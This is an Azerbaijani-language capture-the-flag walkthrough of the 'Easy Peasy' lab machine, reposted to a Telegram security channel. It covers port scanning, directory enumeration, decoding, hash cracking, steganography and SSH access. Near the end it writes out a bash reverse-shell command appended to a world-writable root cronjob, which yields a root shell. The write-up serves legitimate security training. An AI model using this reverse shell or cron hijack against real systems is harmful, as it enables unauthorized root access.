Telegram kanalına qoşularaq bu və digər mövzular üzrə quizlərdə iştirak edə bilərsiniz!
Telegram (Kanal): https://t.me/xakeraz_official
Paylaşım müəllifi: Valida Babayeva ( https://medium.com/@validababayeva222 )
Paylaşıma istinad: https://medium.com/@validababayeva222/easy-peasy-ctf-ccc2fd35a157
Hər kəsə Salam.Bu gün sizlərlə “Easy Peasy” CTF-inin həllini paylaşacam:
Sual 1: Neçə açıq port var?
Sual 2: nginx-in versiyası nədir?
Sual 3: Ən yüksək nömrəli port hansıdır?
Bütün bu suallara sadəcə bir əmrlə cavab verə bilərik:

-A (aqressiv skan): Daha geniş məlumat əldə etmək üçün istifadə edirik.
-p- : Bu əmri çalışdırdıqda isə nmap bütün 65535 portu skan edir
Əgər CTF-i öz kali linux-unuzda işləyirsinizsə, -T4 əmrindən istifadə edib daha tez nəticə əldə edə bilərsiniz.-T5 istifadə etdikdə nmap çox sürətli skan etməyə çalşır ona görə bəzi portları görməyə bilər.Bu səbəblə də CTF-lər zamanı -T4 dən istifadə etmək ən idelalıdır.
Sual 4: Birinci flag hansıdır?
Tapmaq üçün gobuster tool-unu çalışdıracıq:
Burada 2 porta qarşı gobuster çalışdıra bilərik: 80 və 65524.Digər port isə SSH portu olduğu üçün ona qarşı gobuster tool-unu çalışdırmırıq.
80 portuna qarşı gobuster tool-unu çalışdıraq:

/hidden kataloquna baxaq:

source code-unda da məlumat tapa bilmədik.Bir daha gobuster-i çalışdıraq.Kataloq içində kataloq da ola bilər:

/whatever kataloquna baxaq:

Source code-unda base64 encode edilmiş bir məlumat gördük.Onu base64 decode edək:


Sual 5: Ikinci flag hansıdır?
Bunun üçün 65524 portunun /robots.txt kataloquna baxırıq:

MD5 hash-i crack edək:

Sual 6: 3-cü flag hansıdır?
Bunun üçün 65524 portuna baxırıq sadəcə.Göz önündədir flag:

Sual 7: Gizli kataloq nədir?
Tapmaq üçün 65524 portunda olan səhifənin “source code”-una baxırıq:

Base32 encodu-dur bu.Bunu müəyyən etmək üçün dcode.fr saytına müraciət edə bilərsiniz.Decode edəndə isə:

Indi isə bu kataloqa baxaq:

“source code”-unda sha-256 hash-i ilə hashlənmiş məlumat görürük.Crack etmək üçün John The Ripper tool-undan istifadə edəcik.Bunun üçün bir fayl yaradırıq və hash-i onun içinə kopyalayırıq.Sonra isə CTF-in bizə verdiyi wordlist-dən istifadə edərk qırırıq hash-i:

Sual 8: SSH bağlantısı yaratmaq üçün parol nədir?
Bunun üçün steqanoqrafiya ilə məşğul olacıq:

Bu şəkli yükləyib steghide tool-undan istifadə edərək içindəki gizli məlumatı əldə edək.Bayaq tapdığımız parol isə steghide üçün passphrase idi:

Əldə etdiyimiz txt faylının məzmunu oxuyaq:

Parol ASCII kodu ilə verilmişdir.Decode edib parolu əldə edək:

Indi istifadəçi adı və parolu əldə etdiyimizə görə ssh bağlantısı qura bilərik 6498 portu üzərindən:

Indi user flag-ı əldə edək:

Bu flag ROT13 ilə encode edilmişdir.Onlayn tool-lardan istifadə edərək decode edək:

Indi isə root istifadəçisinə yüksəlib sonuncu flagı-i əldə edək.Bunun üçün /etc/crontab faylını oxuyaq:

Sonuncu cronjob-un icazələrinə baxaq:

Faylı həm oxuyub həm də içinə nəsə yaza bilirik.Deməli asanlıqla root ola bilərik.Reverse shell almağa çalışaq.Bunun üçün aşağıdakı əmri çalışdıraq:
- echo “bash -i >& /dev/tcp/mənim_İPin/4445 0>&1” >> /var/www/.mysecretcronjob.sh
Bu bash çıxışlarını TCP bağlantısı ilə mənim İP adresimin 4445 portuna göndərəcək.Bir yandan da öz maşınımızdan netcat ilə dinləmə aparsaq root shell-i almaqlıyıq:

İndi isə sadəcə /root kataloquna keçib root.txt-i oxumaq qaldı:

Bura qədər oxudunuza görə təşəkkülər 🙂
Bəyəndinizsə “clap” etməyi və kanala abunə olmağı unutmayın 🙂
Ümid edirəm sizin üçün faydalı olmuşdur 🙂
Bizi izləyin:
Telegram (Kanal): https://t.me/xakeraz_official
Paylaşımların səliqəli yığılmış halı: https://t.me/xakerazgroup
Fikir və şərhləriniz : https://t.me/xakerazchat